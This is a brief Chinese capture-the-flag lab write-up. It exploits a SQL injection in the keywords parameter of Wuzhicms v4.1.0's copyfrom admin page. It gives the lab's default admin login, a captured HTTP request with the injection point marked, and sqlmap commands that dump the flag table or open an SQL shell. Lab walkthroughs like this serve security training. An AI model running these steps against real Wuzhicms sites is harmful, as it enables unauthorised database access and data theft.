靶场介绍
Wuzhicms v4.1.0 被发现存在一个 SQL 注入漏洞,该漏洞通过位于/core/admin/copyfrom.php
的 $keywords
参数触发。
登录路径
用户名是admin
密码是 admin123
验证码点一下下面的刷新
咱就是脚本小子,抄就完了,有现成的poc多好用
靶场原因,加了一个www,多等一会儿就能登录了。
/www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms
数据包
登录后有cookie,抓包替换或者直接替换URL
URL: /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1
GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1* HTTP/1.1
Host: eci-2zefy6gjpark7avjqvo8.cloudeci1.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.1105117036.1705648933; _ga_J1DQF09WZC=GS1.2.1705648933.1.1.1705649285.0.0.0; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1712050349,1712106330,1712114403,1712226018; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1712226018; PHPSESSID=00e6edb34e0ddf4d7bb76ec5e4584e24; Jun_uid=c69f9xvMa6cghiVDV0FDDk6aL3KWLVkzlvbRrG3D; Jun_username=d56945sjVzGpntSFtL2J4X9AFh4x8W25X83xd4MtfZn5iA; Jun_wz_name=d751r0Z0zqqA8rIdysX%2BL2zsZHFjTBawEq%2BYn%2Fsxy%2FJsnw; Jun_siteid=0917PnFizP6GVj9A0iwK0VbSAYUfnghRaxjBaxly
Connection: close
sqlmap 跑起来
python sqlmap.py -r 1.txt -D wuzhicms -T flllaaaag -dump
直接出flag
或者 --sql-shell
select * from flllaaaag